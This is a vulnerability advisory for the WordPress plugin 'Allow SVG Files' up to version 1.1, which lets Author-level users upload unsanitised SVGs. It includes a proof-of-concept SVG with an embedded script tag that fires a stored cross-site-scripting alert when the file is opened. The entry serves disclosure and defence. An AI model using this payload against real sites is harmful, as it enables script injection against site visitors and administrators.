WordPress Plugin Vulnerabilities
Allow SVG Files <= 1.1 - Author+ Stored Cross Site Scripting via SVG
Description
The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads
Proof of Concept
As an author or above, upload the below SVG file via the Media library: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" /> <script type="text/javascript"> alert(/XSS/); </script> </svg> The XSS will be triggered when accessing the file directly, e.g https://example.com/wp-content/uploads/2022/05/xss.svg
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Luan Pedersini
Submitter
IBLISS Digital Security
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-07-04 (about 1 years ago)
Added
2022-07-04 (about 1 years ago)
Last Updated
2023-04-07 (about 1 years ago)